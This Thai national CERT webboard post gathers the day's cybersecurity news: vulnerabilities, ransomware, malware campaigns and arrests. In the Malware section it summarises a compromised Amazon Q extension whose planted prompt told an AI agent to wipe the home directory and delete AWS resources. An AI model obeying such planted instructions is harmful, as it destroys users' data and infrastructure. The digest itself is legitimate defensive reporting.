NCSA Webboard
    • ล่าสุด
    • แท็ก
    • ฮิต
      • ติดต่อสำนักงาน
    • ลงทะเบียน
    • เข้าสู่ระบบ

    Cyber Threat Intelligence 25 July 2025

    Cyber Security News
    1
    1
    347
    โหลดโพสเพิ่มเติม
    • เก่าสุดไปยังใหม่สุด
    • ใหม่สุดไปยังเก่าสุด
    • Most Votes
    ตอบ
    • ตอบโดยตั้งกระทู้ใหม่
    เข้าสู่ระบบเพื่อตอบกลับ
    Topic นี้ถูกลบไปแล้ว เฉพาะผู้ใช้งานที่มีสิทธิ์ในการจัดการ Topic เท่านั้นที่จะมีสิทธิ์ในการเข้าชม
    • NCSA_THAICERTN
      NCSA_THAICERT
      แก้ไขล่าสุดโดย

      Financial Sector

      • The Bullseye On Banks: Why Financial Services Remain a Prime Target For Cyberattacks
        "The frontlines of cybersecurity have long included the financial services sector, but today’s battlefield is increasingly asymmetric. Threat actors aren’t just going after the big-name banks with sprawling infrastructure and billion-dollar balance sheets. They’re targeting credit unions, wealth management firms, fintech startups, and insurance providers with the same determination and ferocity. What do these entities have that cybercriminals want? Plenty. They are united by their high-value data and direct pathways to financial gain. It’s no surprise then, that a recent report revealed that a staggering 39% of financial firms have experienced a breach."
        https://www.tripwire.com/state-of-security/bullseye-banks-why-financial-services-remain-prime-target-cyberattacks
      • ATM Fraudsters Halted In Europol-Supported Operation Led By Romanian And British Authorities
        "A highly organised criminal group involved in large-scale fraud in Western Europe has been dismantled in a coordinated operation led by authorities from Romania and the United Kingdom (UK), supported by Europol and Eurojust. The gang had travelled from Romania to several Western European countries, mainly the UK, and withdrew large sums of money from ATM machines. They later laundered the proceeds by investing in real estate, companies, vacations and luxury products, including cars and jewellery."
        https://www.europol.europa.eu/media-press/newsroom/news/atm-fraudsters-halted-in-europol-supported-operation-led-romanian-and-british-authorities
        https://www.infosecurity-magazine.com/news/uk-romania-crack-down-atm-fraudster/

      Healthcare Sector

      • Medtronic MyCareLink Patient Monitor
        "Successful exploitation of these vulnerabilities could lead to system compromise, unauthorized access to sensitive data, and manipulation of the monitor's functionality."
        https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-205-01

      Industrial Sector

      • Network Thermostat X-Series WiFi Thermostats
        "Successful exploitation of this vulnerability could allow an attacker to gain full administrative access to the device."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-205-02
      • Honeywell Experion PKS
        "Successful exploitation of these vulnerabilities could result in information exposure, denial of service, or remote code execution."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-205-03
      • Mitsubishi Electric CNC Series
        "Successful exploitation of this vulnerability could allow an attacker to execute malicious code by getting setup-launcher to load a malicious DLL."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-205-01
      • LG Innotek Camera Model LNV5110R
        "Successful exploitation of this vulnerability could allow an attacker to gain administrative access to the device."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-205-04
      • Critical Infrastructure Leaders: Threat Level Remains High
        "OT environments have long been bereft of their traditional shelter from cyberattacks made from hacker ignorance or disinterest. Industrial environments are forefronts for nation-state hacking, the risk heightened by global tensions and the convergence of operational technology with IT counterparts. For those who can hear, alarms have been sounding loudly for some time. Yet advocacy for the basics - public-private partnerships and information sharing, tightly focused objectives that extend to the smallest operators and resilience planning - is still essential, said a clutch of government and industry leaders assembled Wednesday in New York for a panel hosted at the Global Cyber Innovation Summit."
        https://www.bankinfosecurity.com/blogs/critical-infrastructure-leaders-threat-level-remains-high-p-3918

      New Tooling

      • Autoswagger: Open-Source Tool To Expose Hidden API Authorization Flaws
        "Autoswagger is a free, open-source tool that scans OpenAPI-documented APIs for broken authorization vulnerabilities. These flaws are still common, even at large enterprises with mature security teams, and are especially dangerous because they can be exploited with little technical skill. Autoswagger begins by detecting API schemas across a range of common formats and locations, starting with a list of an organization’s domains. It scans for OpenAPI and Swagger documentation pages, sending requests to each host to locate valid schemas. Once identified, it parses the API specifications and automatically generates a list of endpoints to test, taking into account each endpoint’s definition, required parameters, and expected data types."
        https://www.helpnetsecurity.com/2025/07/24/autoswagger-open-source-tool-expose-hidden-api-authorization-flaws/
        https://github.com/intruder-io/autoswagger/

      Vulnerabilities

      • Mitel Warns Of Critical MiVoice MX-ONE Authentication Bypass Flaw
        "Mitel Networks has released security updates to patch a critical-severity authentication bypass vulnerability impacting its MiVoice MX-ONE enterprise communications platform. MX-ONE is the company's SIP-based communications system, which can scale to support hundreds of thousands of users. The critical security flaw is due to an improper access control weakness discovered in the MiVoice MX-ONE Provisioning Manager component and has yet to be assigned a CVE ID. Unauthenticated attackers can exploit it in low-complexity attacks that don't require user interaction to gain unauthorized access to administrator accounts on unpatched systems."
        https://www.bleepingcomputer.com/news/security/mitel-warns-of-critical-mivoice-mx-one-authentication-bypass-flaw/
        https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-misa-2025-0009
        https://thehackernews.com/2025/07/critical-mitel-flaw-lets-hackers-bypass.html
      • SonicWall Urges Admins To Patch Critical RCE Flaw In SMA 100 Devices
        "SonicWall urges customers to patch SMA 100 series appliances against a critical authenticated arbitrary file upload vulnerability that can let attackers gain remote code execution. The security flaw (tracked as CVE-2025-40599) is caused by an unrestricted file upload weakness in the devices' web management interfaces, which can allow remote threat actors with administrative privileges to upload arbitrary files to the system. "SonicWall strongly recommends that users of the SMA 100 series products (SMA 210, 410, and 500v) upgrade to the specified fixed release version to remediate this vulnerability," the company said. "This vulnerability does not affect SonicWall SSL VPN SMA1000 series products or SSL-VPN running on SonicWall firewalls.""
        https://www.bleepingcomputer.com/news/security/sonicwall-warns-of-critical-rce-flaw-in-sma-100-VPN-appliances/
        https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0014
        https://thehackernews.com/2025/07/sophos-and-sonicwall-patch-critical-rce.html
        https://www.securityweek.com/sonicwall-patches-critical-sma-100-vulnerability-warns-of-recent-malware-attack/
        https://securityaffairs.com/180328/security/sonicwall-fixed-critical-flaw-in-sma-100-devices-exploited-in-overstep-malware-attacks.html
        https://www.helpnetsecurity.com/2025/07/24/sonicwall-fixes-critical-flaw-sma-appliances-urges-customers-to-check-for-compromise-cve-2025-40599/
      • Bloomberg Comdb2 Null Pointer Dereference And Denial-Of-Service Vulnerabilities
        "Cisco Talos’ Vulnerability Discovery & Research team recently disclosed five vulnerabilities in Bloomberg Comdb2. Comdb2 is an open source, high-availability database developed by Bloomberg. It supports features such as clustering, transactions, snapshots, and isolation. The implementation of the database utilizes optimistic locking for concurrent operation. The vulnerabilities mentioned in this blog post have been patched by the vendor, all in adherence to Cisco’s third-party vulnerability disclosure policy."
        https://blog.talosintelligence.com/bloomberg-comdb2-null-pointer-dereference-and-denial-of-service-vulnerabilities/
      • Beyond Convenience: Exposing The Risks Of VMware vSphere Active Directory Integration
        "Broadcom's VMware vSphere product remains a popular choice for private cloud virtualization, underpinning critical infrastructure. Far from fading, organizations continue to rely heavily on vSphere for stability and control. We're also seeing a distinct trend where critical workloads are being repatriated from public cloud services to these on-premises vSphere environments, influenced by strategies like bimodal IT and demands for more operational oversight."
        https://cloud.google.com/blog/topics/threat-intelligence/vsphere-active-directory-integration-risks
        https://cloud.google.com/blog/topics/threat-intelligence/defending-vsphere-from-unc3944/

      Malware

      • Storm-2603 Exploits SharePoint Flaws To Deploy Warlock Ransomware On Unpatched Systems
        "Microsoft has revealed that one of the threat actors behind the active exploitation of SharePoint flaws is deploying Warlock ransomware on targeted systems. The tech giant, in an update shared Wednesday, said the findings are based on an "expanded analysis and threat intelligence from our continued monitoring of exploitation activity by Storm-2603." The threat actor attributed to the financially motivated activity is a suspected China-based threat actor that's known to drop Warlock and LockBit ransomware in the past. The attack chains entail the exploitation of CVE-2025-49706, a spoofing vulnerability, and CVE-2025-49704, a remote code execution vulnerability, targeting unpatched on-premises SharePoint servers to deploy the spinstall0.aspx web shell payload."
        https://thehackernews.com/2025/07/storm-2603-exploits-sharepoint-flaws-to.html
        https://www.bleepingcomputer.com/news/security/microsoft-sharepoint-servers-also-targeted-in-ransomware-attacks/
        https://therecord.media/microsoft-says-warlock-ransomware-deployed-in-sharepoint-attacks
        https://www.darkreading.com/endpoint-security/ransomware-actors-toolshell-sharepoint-bugs
        https://cyberscoop.com/microsoft-sharepoint-attacks-400-victims-us-agencies/
        https://www.infosecurity-magazine.com/news/ransomware-compromised-sharepoint/
        https://www.securityweek.com/toolshell-attacks-hit-400-sharepoint-servers-us-government-victims-named/
        https://www.helpnetsecurity.com/2025/07/24/storm-2603-spotted-deploying-ransomware-on-exploited-sharepoint-servers/
        https://www.theregister.com/2025/07/24/microsoft_sharepoint_ransomware/
      • Gunra Ransomware Emerges With New DLS
        "AhnLab TIP monitors the current ransomware group activities across dark web forums, marketplaces, and other sources. Through the Live View > Dark Web Watch menu, users can track the most active ransomware groups, uncover their collaborations, and gain insights into planned attacks and techniques—enabling user organizations to anticipate threats, prepare defenses, and prevent damage before it occurs."
        https://asec.ahnlab.com/en/89206/
      • Uncovering a Stealthy WordPress Backdoor In Mu-Plugins
        "Recently, our team uncovered a particularly sneaky piece of malware tucked away in a place many WordPress users don’t even know exists: the mu-plugins folder. In fact, back in March, we saw a similar trend with hidden malware in this very directory, as detailed in our post Hidden Malware Strikes Again: MU-Plugins Under Attack. This current infection was designed to be quiet, persistent, and very hard to spot."
        https://blog.sucuri.net/2025/07/uncovering-a-stealthy-wordpress-backdoor-in-mu-plugins.html
        https://thehackernews.com/2025/07/hackers-deploy-stealth-backdoor-in.html
        https://securityaffairs.com/180311/malware/stealth-backdoor-found-in-wordpress-mu-plugins-folder.html
      • AI-Generated Malware In Panda Image Hides Persistent Linux Threat
        "The line between human and machine-generated threats is starting to blur. Aqua Nautilus recently uncovered a malware campaign that hints at this unsettling shift. Koske, a sophisticated Linux threat, shows clear signs of AI-assisted development, likely with help from a large language model. With modular payloads, evasive rootkits, and delivery through weaponized image files, Koske represents a new breed of persistent and adaptable malware built for one purpose: cryptomining. It is a warning of what is to come."
        https://www.aquasec.com/blog/ai-generated-malware-in-panda-image-hides-persistent-linux-threat/
        https://www.bleepingcomputer.com/news/security/new-koske-linux-malware-hides-in-cute-panda-images/
      • Unmasking The New Chaos RaaS Group Attacks
        "Cisco Talos Incident Response (Talos IR) recently observed attacks by Chaos, a relatively new ransomware-as-a-service (RaaS) group conducting big-game hunting and double extortion attacks. Chaos RaaS actors initiated low-effort spam flooding, escalating to voice-based social engineering for access, followed by RMM tool abuse for persistent connection and legitimate file-sharing software for data exfiltration. The ransomware utilizes multi-threaded rapid selective encryption, anti-analysis techniques, and targets both local and network resources, maximizing impact while hindering detection and recovery. Talos believes the new Chaos ransomware is unrelated to previous Chaos builder-generated variants, as the group uses the same name to create confusion."
        https://blog.talosintelligence.com/new-chaos-ransomware/
      • Hacker Sneaks Infostealer Malware Into Early Access Steam Game
        "A threat actor called EncryptHub has compromised a game on Steam to distribute info-stealing malware to unsuspecting users downloading the title. A few days ago, the hacker (also tracked as Larva-208), injected malicious binaries into the Chemia game files hosted on Steam. Chemia is a survival crafting game from developer ‘Aether Forge Studios,’ which is currently offered as early access on Steam but has no public release date. According to threat intelligence company Prodaft, the initial compromise occurred on July 22, when EncryptHub added to the game files the HijackLoader malware (CVKRUTNP.exe), which establishes persistence on the victim device and downloads the Vidar infostealer (v9d9d.exe)."
        https://www.bleepingcomputer.com/news/security/hacker-sneaks-infostealer-malware-into-early-access-steam-game/
      • Toptal’s GitHub Organization Hijacked: 10 Malicious Packages Published
        "Socket's Threat Research Team discovered this exact scenario when 73 repositories in Toptal's GitHub organization went public, with at least 10 of them containing malicious code designed to exfiltrate GitHub authentication tokens and destroy victim systems. Toptal, a global talent network that has served over 25,000 clients across 14+ countries since 2010, maintains the Picasso design system used by developers worldwide."
        https://socket.dev/blog/toptal-s-github-organization-hijacked-10-malicious-packages-published
        https://www.bleepingcomputer.com/news/security/hackers-breach-toptal-github-account-publish-malicious-npm-packages/
      • Gamers, Get Ready: Scammers Disguise Cryptocurrency And Password-Stealing Scavenger Trojans As Cheats And Mods
        "Doctor Web’s virus laboratory has detected Trojan.Scavenger—a family of malicious apps that threat actors use to steal confidential data from crypto wallets and password managers from Windows users. Threat actors chain together several trojans from this family, exploiting DLL Search Order Hijacking vulnerabilities to execute their payloads and exfiltrate data."
        https://news.drweb.com/show/?i=15036&lng=en
        https://hackread.com/scavenger-trojan-crypto-wallets-game-mods-browser-flaws/
      • The Dark Side Of Romance: SarangTrap Extortion Campaign
        "In recent weeks, our zLabs team uncovered a highly coordinated and emotionally manipulative malware campaign targeting mobile users on both Android and iOS platforms. This extensive campaign involved over 250 malicious Android applications and more than 80 malicious domains, all disguised as legitimate dating and social media applications. Threat actors used these domains to deceive users into installing malware designed to extract sensitive personal data, such as contact lists and private images, all while maintaining a convincing appearance of normalcy. These malicious apps specifically targeted a diverse audience, including dating app users, cloud file service seekers, and car service platforms (see Figure 1)."
        https://zimperium.com/blog/the-dark-side-of-romance-sarangtrap-extortion-campaign
        https://www.infosecurity-magazine.com/news/malware-campaign-dating-apps/
      • Soco404: Multiplatform Cryptomining Campaign Uses Fake Error Pages To Hide Payload
        "Wiz Research has identified a new iteration of a broader malicious cryptomining campaign, which we’ve dubbed Soco404 (based on the observed payload name, associated domain, and use of fake error pages). While previous activity tied to this campaign has been documented by Aqua and Imperva as targeting exposed Apache Tomcat services with weak credentials , as well as vulnerable Apache Struts and Atlassian Confluence servers, our investigation uncovered a distinct case in which the attacker also targets exposed PostgreSQL instances and leverages compromised Apache Tomcat servers to host payloads tailored for both Linux and Windows environments. We also found evidence that the attacker is maintaining a broader crypto-scam infrastructure, further suggesting this is part of a long-term, versatile, and opportunistic operation."
        https://www.wiz.io/blog/soco404-multiplatform-cryptomining-campaign-uses-fake-error-pages-to-hide-payload
        https://www.infosecurity-magazine.com/news/campaign-exploits-cloud/
      • Fire Ant: A Deep-Dive Into Hypervisor-Level Espionage
        "Since early 2025, Sygnia tracked and responded to incidents attributed to a threat actor we designate Fire Ant. The group demonstrates consistent targeting of virtualization and network infrastructure, using these systems as footholds for initial access, lateral movement, and long-term persistence. Fire Ant’s operations are characterized by infrastructure-centric TTPs, enabling activity beneath the detection threshold of traditional endpoint controls, highlighting critical blind spots of conventional security stacks."
        https://www.sygnia.co/blog/fire-ant-a-deep-dive-into-hypervisor-level-espionage/
        https://thehackernews.com/2025/07/fire-ant-exploits-vmware-flaw-to.html
        https://therecord.media/stealthy-china-spies-fire-ant-virtualization-software
      • CastleLoader Malware Infects 469 Devices Using Fake GitHub Repos And ClickFix Phishing
        "Cybersecurity researchers have shed light on a new versatile malware loader called CastleLoader that has been put to use in campaigns distributing various information stealers and remote access trojans (RATs). The activity employs Cloudflare-themed ClickFix phishing attacks and fake GitHub repositories opened under the names of legitimate applications, Swiss cybersecurity company PRODAFT said in a report shared with The Hacker News. The malware loader, first observed in the wild earlier this year, has been used to distribute DeerStealer, RedLine, StealC, NetSupport RAT, SectopRAT, and even other loaders like Hijack Loader."
        https://thehackernews.com/2025/07/castleloader-malware-infects-469.html
      • FBI: Thousands Of People Involved In 'The Com' Targeting Victims With Ransomware, Swatting
        "The FBI released a warning on Wednesday about a loosely-organized cybercriminal organization known as The Com that is launching cyberattacks to steal money and gain access to sensitive information. The agency released three bulletins about the group — which is composed primarily of English-speaking minors but has expanded to include thousands of people who engage in a variety of cybercriminal activity. The activities include ransomware attacks, swatting, extortion of minors, the distribution of child sexual abuse material, distributed denial-of-service (DDoS) attacks, SIM Swapping, cryptocurrency theft and more. “The motivations behind the criminal activity vary, but often fall within one of the following: financial gain, retaliation, ideology, sexual gratification, and notoriety,” the FBI said."
        https://therecord.media/fbi-the-com-ransomware-swatting-alert
        https://www.ic3.gov/PSA/2025/PSA250723-3
        https://www.infosecurity-magazine.com/news/fbi-exposes-the-coms/
      • Compromised Amazon Q Extension Told AI To Delete Everything – And It Shipped
        "The official Amazon Q extension for Visual Studio Code (VS Code) was compromised to include a prompt to wipe the user's home directory and delete all their AWS resources. The bad extension was live on the VS Code marketplace for two days, though it appears that the intent was more to embarrass AWS and expose bad security rather than to cause immediate harm. A commit to the Amazon Q part of the AWS toolkit for VS Code includes a script that downloads an additional file, saved as extensionNode.ts. The source for this file includes a prompt instructing an AI agent to delete all non-hidden files from the user's home directory and then to "discover and use AWS profiles to list and delete cloud resources using AWS CLI commands.""
        https://www.theregister.com/2025/07/24/amazon_q_ai_prompt/
        https://aws.amazon.com/security/security-bulletins/rss/aws-2025-015/
      • ToolShell: An All-You-Can-Eat Buffet For Threat Actors
        "On July 19, 2025, Microsoft confirmed that a set of zero-day vulnerabilities in SharePoint Server called ToolShell is being exploited in the wild. ToolShell is comprised of CVE-2025-53770, a remote code execution vulnerability, and CVE‑2025‑53771, a server spoofing vulnerability. These attacks target on-premises Microsoft SharePoint servers, specifically those running SharePoint Subscription Edition, SharePoint 2019, or SharePoint 2016. SharePoint Online in Microsoft 365 is not impacted. Exploiting these vulnerabilities enables threat actors to gain entry to restricted systems and steal sensitive information."
        https://www.welivesecurity.com/en/eset-research/toolshell-an-all-you-can-eat-buffet-for-threat-actors/

      General News

      • Why Outsourcing Cybersecurity Is Rising In The Adriatic Region
        "In this Help Net Security interview, Aleksandar Stančin, Board Member Adriatics, Exclusive Networks, discusses the state of cybersecurity in the Adriatic region. He talks about how local markets often lag behind EU regulations, despite facing threats comparable to those in other parts of Europe. While adoption may be slower, progress is underway to strengthen cybersecurity across industries."
        https://www.helpnetsecurity.com/2025/07/24/aleksandar-stancin-exclusive-networks-adriatic-region-cybersecurity/
      • Your App Is Under Attack Every 3 Minutes
        "Application-layer attacks have become one of the most common and consequential methods adversaries use to gain access and compromise organizations, according to Contrast Security. These attacks target the custom code, APIs, and logic that power applications, often slipping past detection tools such as Endpoint Detection and Response (EDR) and network-based defenses such as Web Application Firewalls (WAFs)."
        https://www.helpnetsecurity.com/2025/07/24/adversaries-application-layer-attacks/
      • BlackSuit Ransomware Extortion Sites Seized In Operation Checkmate
        "Law enforcement has seized the dark web extortion sites of the BlackSuit ransomware operation, which has targeted and breached the networks of hundreds of organizations worldwide over the past several years. The U.S. Department of Justice confirmed the takedown in an email earlier today, saying the authorities involved in the action executed a court-authorized seizure of the BlackSuit domains. Earlier today, the websites on the BlackSuit .onion domains were replaced with seizure banners announcing that the ransomware gang's sites were taken down by the U.S. Homeland Security Investigations federal law enforcement agency as part of a joint international action codenamed Operation Checkmate."
        https://www.bleepingcomputer.com/news/security/law-enforcement-seizes-blacksuit-ransomware-leak-sites/
      • Translating Cyber-Risk For The Boardroom
        "Cybersecurity is no longer just a technical problem in today's fast-evolving threat landscape, where cyberattacks are growing more frequent, sophisticated, and publicly damaging. Instead, it's an issue that demands enterprisewide alignment. Yet, many chief information security officers (CISOs) still find themselves speaking a technical language that fails to resonate with other leaders. Technical terms often fall flat in boardrooms more concerned with revenue growth and brand reputation. This disconnect is becoming increasingly risky as cyber incidents now directly affect stock prices, customer trust, and executive job security."
        https://www.darkreading.com/cyber-risk/translating-cyber-risk-boardroom
      • What Makes Great Threat Intelligence?
        "Fast-changing geopolitics is constantly altering the nature of threats, so CISOs must quickly adapt their approach to new risks and sources of intelligence. While the need for high-quality threat intelligence is undeniable, it is a discipline that can sprawl uncontrollably. It also requires a targeted response. Industry analysts at Frost & Sullivan calculated that organizations spent a weighty $1.6 billion on threat intelligence and threat intelligence platforms globally in 2023, and forecast that this figure will increase by a compound annual growth rate of 32.8% until 2028."
        https://www.darkreading.com/threat-intelligence/what-makes-great-threat-intelligence
      • Cybercrime Forum XSS Returns On Mirror And Dark Web 1 Day After Seizure
        "On July 23, 2025, as reported by Hackread.com, the cybercrime community lost one of its oldest and most notorious forums, XSS, after law enforcement authorities seized the site and arrested its suspected administrator in Ukraine. The arrest led to the seizure of the forum’s main domain, XSS.IS, which now displays a notice from Europol, French and Ukrainian authorities. However, the forum’s dark web (.onion) and mirror domains did not show a seizure notice but instead returned a 504 Gateway Timeout error. As of July 24, Hackread.com can confirm that the XSS forum is back online via both its mirror and .onion domains. While it is unclear whether this is a honeypot set up by authorities, one of the forum’s administrators has posted claiming the infrastructure was not affected by the seizure and that a replacement is in progress."
        https://hackread.com/cybercrime-forum-xss-returns-mirror-dark-web-seizure/
      • AI-Generated Image Watermarks Can Be Easily Removed, Say Researchers
        "Now that AI can make fake images that look real, how can we know what’s legitimate and what isn’t? One of the primary ways has been the use of defensive watermarking, which means embedding invisible markers in AI-generated images to show they were made up. Now, researchers have broken that technology. Generative AI isn’t just for writing emails or suggesting recipes. It can generate entire images from scratch. While most people use that for fun (making cartoons of your dog) or practicality (envisioning a woodworking project, say) some use it irresponsibly. One example is creating images that look like real creators’ content (producing an image ‘in the style of’ a particular artist)."
        https://www.malwarebytes.com/blog/news/2025/07/ai-generated-image-watermarks-can-be-easily-removed-say-researchers
        https://github.com/andrekassis/ai-watermark
        https://www.theregister.com/2025/07/24/ai_watermarks_unmarker/
      • Email Threat Radar – July 2025
        "During July, Barracuda threat analysts identified several notable email-based threats targeting organizations around the world. Many of them leveraged popular phishing-as-a-service (PhaaS) kits."
        https://blog.barracuda.com/2025/07/24/email-threat-radar-july-2025
      • US Hits Senior North Korean Officials With Sanctions, $3 Million Bounties
        "Three senior North Korean officials involved in IT schemes have been sanctioned by the U.S. Treasury Department. Kim Se Un, Jo Kyong Hun and Myong Chol Min are accused of helping North Korea evade U.S. and United Nations sanctions through an IT worker plot that involved tricking companies into hiring North Koreans using stolen identities. U.S. law enforcement action centered on Korea Sobaeksu Trading Company — a North Korean company allegedly used as a front for the country’s Munitions Industry Department, which oversees the DPRK’s nuclear program and is involved in the development of ballistic missiles."
        https://therecord.media/us-sanctions-north-korean-officers-it-worker-scheme
        https://www.theregister.com/2025/07/24/laptop_farmer_north_korean_it_scam_sentenced/

      อ้างอิง
      Electronic Transactions Development Agency(ETDA) f9d1cdd3-8066-4471-934d-c9a1d77688b2-image.png

      1 การตอบกลับ คำตอบล่าสุด ตอบ คำอ้างอิง 0
      • First post
        Last post